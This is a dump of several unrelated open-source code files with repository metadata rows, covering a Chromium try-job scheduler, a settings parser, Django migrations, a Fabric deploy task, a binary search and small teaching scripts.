        if failure_level == 'step':
          targeted_tests[failure_name] = []
        else:
          targeted_tests.append(failure_name)
    need_new_try_job = need_new_try_job or failure_need_try_job
    # Keep the earliest known passing build across all traversed failures.
    last_pass = (failure_last_pass if failure_last_pass and
                 failure_last_pass < last_pass else last_pass)
  return targeted_tests, need_new_try_job, last_pass
@ndb.transactional
def _NeedANewTryJob(
    master_name, builder_name, build_number, failed_steps, failure_result_map):
  """Checks transactionally whether a new try_job is needed.

  Returns:
    (need_new_try_job, last_pass, try_job_type, targeted_tests).
  """
  if 'compile' in failed_steps:
    # Compile failures take precedence and carry no targeted tests.
    try_job_type = TryJobType.COMPILE
    targeted_tests = None
    need_new_try_job, last_pass = _CheckFailureForTryJobKey(
        master_name, builder_name, build_number,
        failure_result_map, TryJobType.COMPILE, failed_steps['compile'])
  else:
    try_job_type = TryJobType.TEST
    targeted_tests, need_new_try_job, last_pass = (
        _CheckIfNeedNewTryJobForTestFailure(
            'step', master_name, builder_name, build_number, failure_result_map,
            failed_steps))
  if need_new_try_job:
    try_job = WfTryJob.Get(master_name, builder_name, build_number)
    if not try_job:
      # First request for this build: record a fresh try-job entity.
      try_job = WfTryJob.Create(master_name, builder_name, build_number)
      try_job.put()
    elif try_job.failed:
      # A previous try job failed: mark it pending so it can be retried.
      try_job.status = analysis_status.PENDING
      try_job.put()
    else:
      # A try job is already pending/running/completed; do not start another.
      need_new_try_job = False
  return need_new_try_job, last_pass, try_job_type, targeted_tests
def _GetFailedTargetsFromSignals(signals, master_name, builder_name):
  """Extracts the compile targets to pass to a compile try job.

  Link failures carry no 'source', so their executable targets are always
  passed along; object-file targets (entries with a 'source') are only
  passed for bots configured to use the strict regex extraction.
  """
  if not signals or 'compile' not in signals:
    return []
  strict_regex = waterfall_config.EnableStrictRegexForCompileLinkFailures(
      master_name, builder_name)
  return [
      source_target.get('target')
      for source_target in signals['compile'].get('failed_targets', [])
      if strict_regex or not source_target.get('source')
  ]
def ScheduleTryJobIfNeeded(failure_info, signals=None, build_completed=False):
  """Schedules a Swarming-tasks/try-job pipeline for a completed failed build.

  Args:
    failure_info: dict with master_name, builder_name, build_number and
        optional failed_steps/builds entries.
    signals: failure signals used to extract compile targets, if any.
    build_completed: nothing is scheduled until the build has completed.

  Returns:
    The failure_result_map built while deciding whether a try job is needed
    (an empty dict when nothing was scheduled).
  """
  # Do not schedule try-jobs or Swarming tasks until the build is completed.
  if not build_completed:
    return {}
  master_name = failure_info['master_name']
  builder_name = failure_info['builder_name']
  build_number = failure_info['build_number']
  # NOTE(review): the default here is a list, but downstream code treats
  # failed_steps as a dict ('compile' in failed_steps, failed_steps['compile']
  # in _NeedANewTryJob) -- membership works either way, but confirm intent.
  failed_steps = failure_info.get('failed_steps', [])
  builds = failure_info.get('builds', {})
  tryserver_mastername, tryserver_buildername = (
      waterfall_config.GetTrybotForWaterfallBuilder(master_name, builder_name))
  if not tryserver_mastername or not tryserver_buildername:
    logging.info('%s, %s is not supported yet.', master_name, builder_name)
    return {}
  failure_result_map = {}
  need_new_try_job, last_pass, try_job_type, targeted_tests = (
      _NeedANewTryJob(master_name, builder_name, build_number,
                      failed_steps, failure_result_map))
  if need_new_try_job:
    # Compile targets only apply to compile try jobs.
    compile_targets = (_GetFailedTargetsFromSignals(
        signals, master_name, builder_name)
                       if try_job_type == TryJobType.COMPILE else None)
    # Start the pipeline on the waterfall backend queue, passing the
    # last-pass and current-build revisions plus the blame list.
    pipeline = (
        swarming_tasks_to_try_job_pipeline.SwarmingTasksToTryJobPipeline(
            master_name, builder_name, build_number,
            builds[str(last_pass)]['chromium_revision'],
            builds[str(build_number)]['chromium_revision'],
            builds[str(build_number)]['blame_list'],
            try_job_type, compile_targets, targeted_tests))
    pipeline.target = appengine_util.GetTargetNameForModule(
        constants.WATERFALL_BACKEND)
    pipeline.start(queue_name=constants.WATERFALL_TRY_JOB_QUEUE)
    if try_job_type == TryJobType.TEST: # pragma: no cover
      logging_str = (
          'Swarming task was scheduled for build %s, %s, %s: %s because of'
          ' %s failure. A try job may be triggered if some reliable failure'
          ' is detected in the task.') % (
              master_name, builder_name, build_number,
              pipeline.pipeline_status_path, try_job_type)
    else: # pragma: no cover
      logging_str = (
          'Try job was scheduled for build %s, %s, %s: %s because of %s '
          'failure.') % (
              master_name, builder_name, build_number,
              pipeline.pipeline_status_path, try_job_type)
    logging.info(logging_str)
  return failure_result_map
| 38.434555 | 80 | 0.721428 | 967 | 7,341 | 5.155119 | 0.196484 | 0.055366 | 0.071615 | 0.088465 | 0.410431 | 0.330592 | 0.247944 | 0.234704 | 0.221063 | 0.211434 | 0 | 0.001026 | 0.203378 | 7,341 | 190 | 81 | 38.636842 | 0.851402 | 0.156246 | 0 | 0.29927 | 0 | 0.007299 | 0.081397 | 0 | 0 | 0 | 0 | 0.005263 | 0 | 1 | 0.036496 | false | 0.10219 | 0.065693 | 0 | 0.175182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7a7e76d080d012d4a75a0317b71ab3a4be2a2138 | 269 | py | Python | src/boiga/util.py | amarshall/boiga | faef732a59b7308b0f3be0d1d1ea047a405d641d | [
"MIT"
] | 2 | 2018-10-30T13:17:23.000Z | 2018-11-19T06:39:49.000Z | src/boiga/util.py | amarshall/boiga | faef732a59b7308b0f3be0d1d1ea047a405d641d | [
"MIT"
] | 2 | 2020-03-24T16:15:45.000Z | 2020-03-31T00:02:27.000Z | src/boiga/util.py | amarshall/boiga | faef732a59b7308b0f3be0d1d1ea047a405d641d | [
"MIT"
] | null | null | null | import typing as T
_T = T.TypeVar('_T')


class _Container(T.Generic[_T]):
    """Generic wrapper that compares equal when wrapped values are equal."""

    _value: _T

    def __eq__(self, other: object) -> bool:
        # Anything that is not a _Container (or a subclass of ours) never
        # compares equal; otherwise delegate to the wrapped values.
        if not isinstance(other, self.__class__):
            return False
        return self._value == other._value
| 19.214286 | 46 | 0.594796 | 34 | 269 | 4.235294 | 0.588235 | 0.027778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.29368 | 269 | 13 | 47 | 20.692308 | 0.757895 | 0 | 0 | 0 | 0 | 0 | 0.007435 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7a84f01ca428f54ff44dff96ff54b827f508dc48 | 3,179 | py | Python | src/parse_settings.py | ChillerDragon-backup/TeeworldsEconMod | d41560104f79ebbeea2b9e6227ae7e93c1a90ec2 | [
"MIT"
] | 5 | 2019-05-04T00:48:12.000Z | 2021-02-22T11:03:19.000Z | src/parse_settings.py | ChillerDragon-backup/TeeworldsEconMod | d41560104f79ebbeea2b9e6227ae7e93c1a90ec2 | [
"MIT"
] | 41 | 2019-04-04T16:04:14.000Z | 2022-01-24T20:35:20.000Z | src/parse_settings.py | ChillerDragon-backup/TeeworldsEconMod | d41560104f79ebbeea2b9e6227ae7e93c1a90ec2 | [
"MIT"
] | 1 | 2018-11-04T20:16:28.000Z | 2018-11-04T20:16:28.000Z | #!/usr/bin/env python3
"""Module for parsing tem setting files"""
from base.rcon import echo
import base.settings
class TemParseError(Exception):
    """Raised when a tem settings file cannot be parsed."""

    def __init__(self, value):
        super().__init__()
        # Keep the offending message around; __str__ echoes its repr.
        self.value = value

    def __str__(self):
        return repr(self.value)
def parse_error(err_type: str, err_msg: str):
    """Echo a parser error to the rcon console and raise TemParseError."""
    message = str(err_type) + ": " + str(err_msg)
    echo("[ERROR:settings] " + message)
    raise TemParseError(message)
def parse_bool(val: str, line_num: int) -> bool:
    """Parse a boolean setting value ("0"/"false" or "1"/"true", any case)."""
    val = val.lower()
    if val in ("1", "true"):
        return True
    if val in ("0", "false"):
        return False
    # Anything else is a hard parse error (parse_error raises).
    parse_error("BoolError", "cannot parse bool " + str(line_num) + ":'" + str(val) + "'")
    return False
def parse_list_dyn(val: str):
    """Split a comma-separated value into a list.

    None, the empty string and a lone comma all mean "no values configured"
    and yield None.
    """
    if val in (None, "", ","):
        return None
    return val.split(',')
def parse_list(sett: str, val: str, line_num: int):
    """Validate val against the fixed set of values declared for sett."""
    declared_type = base.settings.Settings().settings_dict[sett][0]
    # The declaration looks like "[a,b,c]"; strip the brackets and split.
    list_vals = declared_type[1:-1].split(',')
    if val not in list_vals:
        parse_error("ListError", str(line_num) + ":'" + str(val) + "' not in list " + str(list_vals))
        return ""
    return str(val)
def read_settings_line(line: str, line_num: int):
    """Parse single line of tem settings file.

    Splits the line at the first '=', looks the setting up in the global
    settings dict and stores the value converted to its declared type.
    Unknown settings or types raise TemParseError via parse_error.
    """
    split = line.find("=")
    # NOTE(review): the name starts at index 3, i.e. a 3-character prefix
    # (like the skipped "sh_" lines) is assumed before every setting name --
    # confirm against the settings file format.
    sett = line[3:split]
    val = line[split+1:].strip()
    settings = base.settings.Settings()
    if sett not in settings.settings_dict:
        parse_error(
            "UnkownSetting",
            "line[" + str(line_num) + "] setting[" + str(sett) + "] value[" + str(val) + "]")
    # make sure file_database is a folder
    if sett == "file_database":
        if val[-1] != "/":
            val += "/"
    # settings_dict[sett][0] holds the declared type, [1] the parsed value.
    if settings.settings_dict[sett][0] == "str":
        settings.settings_dict[sett][1] = str(val)
    elif settings.settings_dict[sett][0] == "int":
        settings.settings_dict[sett][1] = int(val)
    elif settings.settings_dict[sett][0] == "bool":
        settings.settings_dict[sett][1] = parse_bool(val, line_num)
    elif settings.settings_dict[sett][0][0] == "[":
        if settings.settings_dict[sett][0][1] == "]": # empty list ( no limit )
            settings.settings_dict[sett][1] = parse_list_dyn(val)
        else: # pre defined allowed values in list
            settings.settings_dict[sett][1] = parse_list(sett, val, line_num)
    else:
        parse_error(
            "TypeError",
            "invalid type " + str(line_num) + ":'" + str(settings.settings_dict[sett][0]) + "'")
def read_settings_file(file: str):
    """Parse a tem settings file given its filepath, line by line."""
    with open(file, encoding='UTF-8') as file_io:
        for line_num, line in enumerate(file_io, start=1):
            if line.startswith("#"):
                continue  # comment line
            if line.startswith("sh_"):
                continue  # shell-only setting
            if not line.strip():
                continue  # blank line
            read_settings_line(line, line_num)
| 34.934066 | 97 | 0.587921 | 420 | 3,179 | 4.27381 | 0.240476 | 0.133705 | 0.144847 | 0.160446 | 0.261838 | 0.13649 | 0.073538 | 0 | 0 | 0 | 0 | 0.01146 | 0.258886 | 3,179 | 90 | 98 | 35.322222 | 0.750424 | 0.119534 | 0 | 0.128571 | 0 | 0 | 0.068677 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.028571 | 0.014286 | 0.271429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a8afbf7a5a5a3530cfe29a371a839efa2a02e4a | 491 | py | Python | Exemples cours 5/pointOBJ.py | geocot/coursPython | 74f634a96146c2244f859b9d449534330d9542fb | [
"Apache-2.0"
] | null | null | null | Exemples cours 5/pointOBJ.py | geocot/coursPython | 74f634a96146c2244f859b9d449534330d9542fb | [
"Apache-2.0"
] | null | null | null | Exemples cours 5/pointOBJ.py | geocot/coursPython | 74f634a96146c2244f859b9d449534330d9542fb | [
"Apache-2.0"
] | null | null | null | class Point:
"Classe Point géographique contenant une position"
def __init__(self,x,y):
self._x=x
self._y=y
def getx(self):
return self._x
def gety(self):
return self._y
def setx(self, x):
self._x = x
def sety(self, y):
self._y = y
def translation(self,valeur):
self._x +=valeur
self._y +=valeur
# Demo: build a point, shift it by 2 on both axes and print the result.
p1 = Point(-73,45)
p1.translation(2)
print(p1.getx())  # -71
print(p1.gety())  # 47
| 19.64 | 55 | 0.535642 | 68 | 491 | 3.691176 | 0.352941 | 0.119522 | 0.047809 | 0.071713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027864 | 0.342159 | 491 | 24 | 56 | 20.458333 | 0.749226 | 0.09776 | 0 | 0.2 | 0 | 0 | 0.103226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0.1 | 0.45 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a8b9bc8c83018223580b28db60854c71ccc69e4 | 1,826 | py | Python | fabfile.py | zzz123-tech/zhanzhenblog | 0faafe4f1977b4d42bc9c5b992ab7f42bf3bfe0d | [
"MIT"
] | null | null | null | fabfile.py | zzz123-tech/zhanzhenblog | 0faafe4f1977b4d42bc9c5b992ab7f42bf3bfe0d | [
"MIT"
] | 5 | 2021-04-08T19:40:57.000Z | 2021-09-22T19:40:18.000Z | fabfile.py | zzz123-tech/zhanzhenblog | 0faafe4f1977b4d42bc9c5b992ab7f42bf3bfe0d | [
"MIT"
] | null | null | null | from fabric import task
from invoke import Responder
from _credentials import github_username, github_password
def _get_github_auth_responders():
    """
    Build auto-fill responders for GitHub's username and password prompts.
    """
    prompts = [
        ("Username for 'https://github.com':", github_username),
        ("Password for 'https://{}@github.com':".format(github_username),
         github_password),
    ]
    return [Responder(pattern=pattern, response='{}\n'.format(answer))
            for pattern, answer in prompts]
@task()
def deploy(c):
    """Deploy the blog: stop the app, pull the latest code, install
    dependencies / migrate / collect static files, then restart."""
    supervisor_conf_path = '~/etc/'
    supervisor_program_name = 'zhanzhenblog'
    project_root_path = '~/apps/zhanzhenblog/'
    # Stop the application first
    with c.cd(supervisor_conf_path):
        cmd = '/home/zhanzhen/.local/bin/supervisorctl stop {}'.format(supervisor_program_name)
        c.run(cmd)
    # Enter the project root and pull the latest code from Git
    with c.cd(project_root_path):
        cmd = 'git pull'
        responders = _get_github_auth_responders()
        c.run(cmd, watchers=responders)
    # Install dependencies, migrate the database, collect static files
    with c.cd(project_root_path):
        c.run('pipenv install --deploy --ignore-pipfile')
        c.run('pipenv run python manage.py migrate')
        c.run('pipenv run python manage.py collectstatic --noinput')
    # Restart the application
    with c.cd(supervisor_conf_path):
        cmd = '/home/zhanzhen/.local/bin/supervisorctl start {}'.format(supervisor_program_name)
        c.run(cmd)
| 38.041667 | 120 | 0.535597 | 174 | 1,826 | 5.413793 | 0.390805 | 0.025478 | 0.029724 | 0.048832 | 0.305732 | 0.305732 | 0.259023 | 0.129512 | 0.129512 | 0.129512 | 0 | 0 | 0.366375 | 1,826 | 47 | 121 | 38.851064 | 0.814175 | 0.039978 | 0 | 0.1875 | 0 | 0 | 0.20058 | 0.045217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0.15625 | 0.09375 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7a8cb2e77bc04acf83fe78c12ebe944bd64c7b64 | 396 | py | Python | user/migrations/0009_user_website.py | kthaisse/website | be0d0e0763ae2a6b8351c08b432229eae9521f1d | [
"MIT"
] | 1 | 2020-03-19T09:44:16.000Z | 2020-03-19T09:44:16.000Z | user/migrations/0009_user_website.py | kthaisse/website | be0d0e0763ae2a6b8351c08b432229eae9521f1d | [
"MIT"
] | 43 | 2020-02-22T09:32:27.000Z | 2022-03-22T11:24:51.000Z | user/migrations/0009_user_website.py | kthaisse/website | be0d0e0763ae2a6b8351c08b432229eae9521f1d | [
"MIT"
] | 3 | 2020-03-06T13:27:12.000Z | 2022-02-07T09:01:07.000Z | # Generated by Django 2.2.10 on 2020-04-04 17:49
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds an optional free-text 'website' field to the User model.
    dependencies = [("user", "0008_user_picture_restrictions")]
    operations = [
        migrations.AddField(
            model_name="user",
            name="website",
            # Blank allowed in forms, NULL allowed in the database.
            field=models.CharField(blank=True, max_length=255, null=True),
        )
    ]
| 23.294118 | 74 | 0.633838 | 46 | 396 | 5.347826 | 0.76087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077441 | 0.25 | 396 | 16 | 75 | 24.75 | 0.750842 | 0.116162 | 0 | 0 | 1 | 0 | 0.12931 | 0.086207 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a9163686720b28ba98796c68d0cd6e016ed9e64 | 1,637 | py | Python | binary_for_search.py | jorgeMorfinezM/binary_search_algorithms | 75a4f6febe6ffddbaa09aa10c87ba76027cd7af3 | [
"Apache-2.0"
] | null | null | null | binary_for_search.py | jorgeMorfinezM/binary_search_algorithms | 75a4f6febe6ffddbaa09aa10c87ba76027cd7af3 | [
"Apache-2.0"
] | null | null | null | binary_for_search.py | jorgeMorfinezM/binary_search_algorithms | 75a4f6febe6ffddbaa09aa10c87ba76027cd7af3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Algoritmo de busqueda binaria usando el ciclo while
escrito en Python.
Este metodo funciona con cadenas y numeros por igual, ya
que el lenguaje trata a las cadenas lexicograficamente;
comparando sus valores en el codigo ASCII
"""
def binary_search(list_data, search_data):
    """Return the index of search_data in the sorted list_data, or -1.

    Works for numbers and strings alike, since Python orders strings
    lexicographically by their character codes.
    """
    lo, hi = 0, len(list_data) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        candidate = list_data[mid]
        if candidate == search_data:
            return mid
        if candidate < search_data:
            lo = mid + 1
        else:
            hi = mid - 1
    # Range exhausted: the value is not present in the list.
    return -1
"""
Tests
"""
# Test con arreglo numericos
data_list = [1, 2, 3, 10, 50, 80, 120, 150, 500, 1000]
print("Busqueda para la lista: ", data_list)
data_search = 500
index_search = binary_search(data_list, data_search)
print("El elemento {} esta en el indice {}".format(data_search, index_search))
# Test con arreglo de cadenas
data_list = ["Albino", "Bambu", "Becerro", "Contaminacion", "Cortina", "Trampolin"]
print("Busqueda para la lista: ", data_list)
data_search = "Cortina"
index_search = binary_search(data_list, data_search)
print("El elemento {} esta en el indice {}".format(data_search, index_search))
data_chars = ["{", "[", "]", "}", "]"]
print("Busqueda para la lista: ", data_chars)
data_search = '['
search = binary_search(data_chars, data_search)
print("El elemento {} esta en el indice {}".format(data_search, search)) | 25.184615 | 83 | 0.6854 | 231 | 1,637 | 4.649351 | 0.367965 | 0.102421 | 0.065177 | 0.067039 | 0.336127 | 0.336127 | 0.310056 | 0.310056 | 0.310056 | 0.231844 | 0 | 0.024409 | 0.199145 | 1,637 | 65 | 84 | 25.184615 | 0.794813 | 0.229078 | 0 | 0.222222 | 0 | 0 | 0.191283 | 0 | 0 | 0 | 0 | 0.015385 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.111111 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a916a9d126a25799ce3473d1cbc7c356c7ec1da | 353 | py | Python | ressources/migrations/0005_auto_20200804_2357.py | rollanda21/Genetic-algorithm-for-time-table-generation | fb1ab13ab54da1a5d0582787baa2c444a9a838db | [
"MIT"
] | null | null | null | ressources/migrations/0005_auto_20200804_2357.py | rollanda21/Genetic-algorithm-for-time-table-generation | fb1ab13ab54da1a5d0582787baa2c444a9a838db | [
"MIT"
] | null | null | null | ressources/migrations/0005_auto_20200804_2357.py | rollanda21/Genetic-algorithm-for-time-table-generation | fb1ab13ab54da1a5d0582787baa2c444a9a838db | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-08-04 22:57
from django.db import migrations
class Migration(migrations.Migration):
    dependencies = [
        ('ressources', '0004_auto_20200731_1630'),
    ]
    operations = [
        # Order MeetingTime records by their 'day' field by default.
        migrations.AlterModelOptions(
            name='meetingtime',
            options={'ordering': ('day',)},
        ),
    ]
| 19.611111 | 50 | 0.594901 | 35 | 353 | 5.914286 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121569 | 0.27762 | 353 | 17 | 51 | 20.764706 | 0.690196 | 0.127479 | 0 | 0 | 1 | 0 | 0.179739 | 0.075163 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a9c270af83981606714f4300077542e6e870eab | 378 | py | Python | archive/migrations/0007_auto_20190715_0559.py | emawind84/rrwebtv | ae22cd39ea430aed0de2b852e40c309465a7237b | [
"MIT"
] | null | null | null | archive/migrations/0007_auto_20190715_0559.py | emawind84/rrwebtv | ae22cd39ea430aed0de2b852e40c309465a7237b | [
"MIT"
] | 2 | 2020-06-05T20:13:36.000Z | 2021-06-10T21:18:43.000Z | archive/migrations/0007_auto_20190715_0559.py | emawind84/rrwebtv | ae22cd39ea430aed0de2b852e40c309465a7237b | [
"MIT"
] | null | null | null | # Generated by Django 2.0.13 on 2019-07-15 05:59
from django.db import migrations
class Migration(migrations.Migration):
    dependencies = [
        ('archive', '0006_performance_featured'),
    ]
    operations = [
        # Rename Performance.pilot_nickname to the shorter 'pilot'.
        migrations.RenameField(
            model_name='performance',
            old_name='pilot_nickname',
            new_name='pilot',
        ),
    ]
| 19.894737 | 49 | 0.600529 | 39 | 378 | 5.666667 | 0.794872 | 0.081448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074627 | 0.291005 | 378 | 18 | 50 | 21 | 0.75 | 0.121693 | 0 | 0 | 1 | 0 | 0.187879 | 0.075758 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aa00615c0b94b6e49a52a8d141fa1c7aa174f50 | 2,089 | py | Python | Week1/main.py | EricCharnesky/CIS2001-Winter2022 | 9c74433ade96e4c7bf9029543285f1ded1fe91e5 | [
"MIT"
] | 3 | 2022-01-20T21:55:17.000Z | 2022-02-02T23:10:45.000Z | Week1/main.py | EricCharnesky/CIS2001-Winter2022 | 9c74433ade96e4c7bf9029543285f1ded1fe91e5 | [
"MIT"
] | null | null | null | Week1/main.py | EricCharnesky/CIS2001-Winter2022 | 9c74433ade96e4c7bf9029543285f1ded1fe91e5 | [
"MIT"
] | 2 | 2022-02-06T02:59:32.000Z | 2022-02-23T02:34:13.000Z | import random
# Read three integers from the user and print their sum.
value_a = int(input("enter the first number"))
value_b = int(input("enter the second number"))
value_c = int(input("enter the third number"))
print(value_b + value_a + value_c)
# Build a list of 100 random integers in [1, 100].
list_of_numbers = []
for number in range(100):
    list_of_numbers.append(random.randint(1,100)) # inclusive of both values
# Manual min/max/total scan, seeded with the first element.
minimum_value = list_of_numbers[0]
maximum_value = list_of_numbers[0]
total = list_of_numbers[0]
for index in range(1, len(list_of_numbers)):
    if list_of_numbers[index] < minimum_value:
        minimum_value = list_of_numbers[index]
    if list_of_numbers[index] > maximum_value:
        maximum_value = list_of_numbers[index]
    total += list_of_numbers[index]
# The same scan, written with direct iteration.
# BUG(review): inside this loop 'index' is the stale value left over from
# the previous loop (always the last index), so these two assignments store
# the wrong element -- they should assign 'number' instead.
for number in list_of_numbers:
    if number< minimum_value:
        minimum_value = list_of_numbers[index]
    if number > maximum_value:
        maximum_value = list_of_numbers[index]
    total += number
# NOTE(review): 'total' has now accumulated the list twice (once per loop),
# so this printed average is roughly double the true mean.
average = total / len(list_of_numbers)
print("Min value:", minimum_value)
print("Max value:", maximum_value)
print("average:", average)
# book
# number formatting from https://www.bing.com/search?q=python+string+format+number+decimal+places&cvid=c321953d925a4c3f99ca309d2a4eff65&aqs=edge.0.0j69i57.8149j0j1&pglt=43&FORM=ANNTA1&PC=W000
# Built-in min/max/sum compute the same statistics in one expression each.
print("Min: {:d} - max: {:d} - average: {:.2f}".format(
    min(list_of_numbers), max(list_of_numbers), sum(list_of_numbers) / len(list_of_numbers)))
print("Min:", min(list_of_numbers), "- max:", max(list_of_numbers), "- average: ",
      sum(list_of_numbers) / len(list_of_numbers))
# Dict demo: student name -> letter grade.
gradebook = {}
gradebook['Eric'] = 'A' # keys have to be unique
gradebook['Jeb'] = 'A' # will add new value if the key doesn't exist
gradebook['Eric'] = 'B' # changes the value
name = input("Enter the name of someone to get their grade")
if name in gradebook:
    print(gradebook[name])
else:
    print("they are not in the gradebook, let's add them, what is their grade?")
    grade = input()
    # NOTE(review): the new entry is stored lower-cased while the lookup
    # above used the raw input, so mixed-case names will not match again
    # until the normalization loop below has run.
    gradebook[name.lower()] = grade
# Normalize every key to lower case; iterate over a copied key list because
# the dict is mutated inside the loop.
for key in list(gradebook.keys()):
    grade = gradebook[key]
    gradebook.pop(key)
    gradebook[key.lower()] = grade
print(gradebook)
| 31.651515 | 191 | 0.713739 | 316 | 2,089 | 4.515823 | 0.313291 | 0.096706 | 0.20953 | 0.088297 | 0.284513 | 0.194814 | 0.17239 | 0.17239 | 0.12754 | 0 | 0 | 0.028377 | 0.156534 | 2,089 | 65 | 192 | 32.138462 | 0.781498 | 0.145524 | 0 | 0.085106 | 0 | 0 | 0.15748 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.021277 | 0.191489 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aa7b397c8a186c0ba8a769562764b679d11f2b9 | 3,613 | py | Python | train.py | Unique-Divine/Neural-Networks-for-Gravitational-Lens-Modeling | cd64ceda84bdd1486ad17585074ba8c7a0576ab5 | [
"MIT"
] | null | null | null | train.py | Unique-Divine/Neural-Networks-for-Gravitational-Lens-Modeling | cd64ceda84bdd1486ad17585074ba8c7a0576ab5 | [
"MIT"
] | null | null | null | train.py | Unique-Divine/Neural-Networks-for-Gravitational-Lens-Modeling | cd64ceda84bdd1486ad17585074ba8c7a0576ab5 | [
"MIT"
] | null | null | null | ############### OPTIMIZER:
learning_rate = 1e-6
# Adam optimizer minimizing the mean-square cost over the trainable params.
train_step = tf.train.AdamOptimizer(learning_rate).minimize(
    MeanSquareCost, var_list=train_pars)
##########################
num_batch_samples = 50
num_iterations = 1
min_eval_cost = 0.06
# Training buffers: flattened images (numpix_side**2 values per sample),
# labels and magnitudes, per the np.zeros shapes below.
X = np.zeros((cycle_batch_size, numpix_side*numpix_side), dtype='float32')
Y = np.zeros((cycle_batch_size, num_out), dtype='float32')
MAG = np.zeros((cycle_batch_size, 1), dtype='float32')
min_unmasked_flux = 0.98
# Held-out test buffers with the same layout.
X_test = np.zeros((num_test_samples, numpix_side*numpix_side), dtype='float32')
Y_test = np.zeros((num_test_samples, num_out), dtype='float32')
MAG_test = np.zeros((num_test_samples, 1), dtype='float32')
max_noise_rms = max_testnoise_rms
# Load the fixed test set once up front.
read_data_batch(X_test, Y_test, MAG_test, max_num_test_samples, 'test')
sess = tf.Session()
sess.run(tf.global_variables_initializer())
if RESTORE:
    restorer.restore(sess, restore_file)
n = 0  # global iteration counter
ind_t = range(num_test_samples)
train_cost = 0
write_time = time.time()  # NOTE(review): assigned but never used below
start_time = time.time()
for i_sample in range(1000000):
    # NOTE(review): i_sample % 1 == 0 is always true, so a fresh training
    # batch (with training-level noise) is read on every outer iteration.
    if i_sample%1 == 0:
        max_noise_rms = max_trainoise_rms
        min_unmasked_flux = 0.75
